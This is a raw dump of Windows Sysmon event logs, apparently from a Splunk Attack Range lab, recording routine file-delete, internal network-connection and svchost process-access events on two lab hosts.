08:09:31.554{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FD0763F451D16AB571DDAC0571595FC,SHA256=57820BC5938CE4FCD6D5463A7E2BE08CE34F6AFF7218C357A16CE9D0FEBD873D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:31.152{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95909658ED3406ECAB3E240739A08CEB,SHA256=E60F6AC662BAD5618E02A9C58A52DF6BF38C2545E7D219F69709E91733570B42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:32.570{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14052D2D9E443EC954A317B96918D428,SHA256=55B038DBFA5F9126CF7A020925A53D6358E113F7633BF70323887E3874B4621C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:32.152{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F4F78C44E1DCB53BEB47D31CEEF0226,SHA256=C15F261DAE6F3F9DC1BC1C1E890C3F50536643B7FC745050E50D4BEA5FE9E57F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:33.574{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A79CF52AD2C0EFA88D7F9188EEEEEAF,SHA256=A10CD6D54424B62477B562D93ACD640219B4BD800289E1DACA7E57404D4EFFD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:33.167{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8265C1142E14F61A70E763EDB09CF53,SHA256=445C7EAED102654B608F2BF7948149A61BF76EE34546ED561588C8ED65EB2F16,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:33.203{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57486-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:34.601{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF726AC63623F4B6195663E1E9127697,SHA256=E8091794B941012AE9B1B2670D179AF2994E44AF877CC5CB6E5352A27E948B9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:34.183{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8A35E2F94855DB9E03B81988135BF54,SHA256=FE0A15BBA6455FD2B68CFC77AB901B033B04A07385FA56B812F2D8A76CB79766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:35.636{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DECAC6D67E35A07CAD281B6DA045A7F,SHA256=CB8C036410551C5BDB8FAB4695A5C5211A556BB5667D0FA0B46E8804759920B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:35.202{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73B5F3E5A28685D9AC6AA2F01044DC55,SHA256=F46FD96ED21AF4A0378D776F44D4F469DD9CDC4B192129D000ADCF6B5BFFC9EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:36.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8581B93CA40BE2DF841B4E93DA3AC3A8,SHA256=CF3F401DBA58BACDAACAEDFD42EB421E7F4D051C9EBC25B3340141620EE29FD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33170AEA4234D0CB076331D435D80951,SHA256=DDD9F161768D572CBF78B0914973FA72E54A8A432EF23BA2BC48D8A606946FBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:27.706{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61998-false10.0.1.12-8000- 10341000x80000000000000001055359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 